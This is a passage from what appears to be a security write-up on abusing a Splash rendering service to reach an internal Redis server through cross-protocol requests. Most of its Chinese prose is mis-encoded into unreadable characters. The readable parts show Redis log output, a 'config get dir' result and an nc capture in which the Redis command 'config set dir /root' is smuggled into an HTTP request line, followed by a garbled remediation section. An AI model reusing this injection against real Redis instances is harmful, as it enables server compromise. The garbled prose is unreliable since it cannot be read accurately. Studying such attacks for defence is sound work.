ÔËÐкó redis ·¢³öÁ˾¯¸æ (¸ß°æ±¾µÄй¦ÄÜ) 24089:M 11 Jul 23:29:07.730 - Accepted 172.17.0.2:56886 24089:M 11 Jul 23:29:07.730 # Possible SECURITY ATTACK detected. It looks like somebody is sending POST or Host: commands to Redis. This is likely due to an attacker attempting to use Cross Protocol Scripting to compromise your Redis instance. Connection aborted.

µ«ÊÇÖ´ÐÐÁË

172.16.10.74:6379> config get dir 1) "dir" 2) "/root"

ºóÀ´ÓÖ²âÊÔÁËһϠpost body£¬·¢ÏÖ body »¹Ã»·¢³öÈ¥£¬Á¬½Ó¾Í±»Ç¿ÖƶϿªÁË£¬ËùÒÔÎÞ·¨ÀûÓÃ

ÕâÀïÓà nc À´¿´Ò»Ï·¢Ë͵ÄÊý¾Ý°ü

root@test:/home/user/Desktop# nc -vv -l -p 5555 Listening on [0.0.0.0] (family 0, port 5555) Connection from [172.17.0.2] port 5555 [tcp/*] accepted (family 2, sport 38384) GET / HTTP/1.1 config set dir /root : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) splash Safari/538.1 Connection: Keep-Alive Accept-Encoding: gzip, deflate Accept-Language: en,* Host: 172.16.10.74:5555

¿ÉÒÔ¿´µ½  config set dir /root£¬ËµÃ÷¿ÉÒÔÀûÓÃ

ÆäËûµÄ»°£¬ÒòΪ֧³Öpost£¬Ò²¿ÉÒÔ½áºÏһЩÄÚÍøϵͳ½øÐÐÀûÓã¬ÕâÀï¾Í²»Ï¸ËµÁË

0x 04 ÐÞ¸´·½°¸

¶ÔÓÚsplash£¬¿´ÁËÏÂÎĵµ£¬Ã»ÓÐÌáµ½ÈÏ֤˵Ã÷£¬Ó¦¸ÃÊÇÓ¦Óñ¾Éí¾ÍûÓÐÕâ¸ö¹¦ÄÜ£¬ËùÒÔµÃ×Ô¼º¼ÓÈÏÖ¤£¬ÁÙʱ·½°¸¿ÉÒÔÓà basic ÈÏÖ¤£¬³¹µ×ÐÞ¸´µÄ»°»¹ÊǵÃ×Ô¼ºÐ޸ĴúÂ룬¼ÓÉÏÈÏÖ¤¹¦ÄÜ

¡¡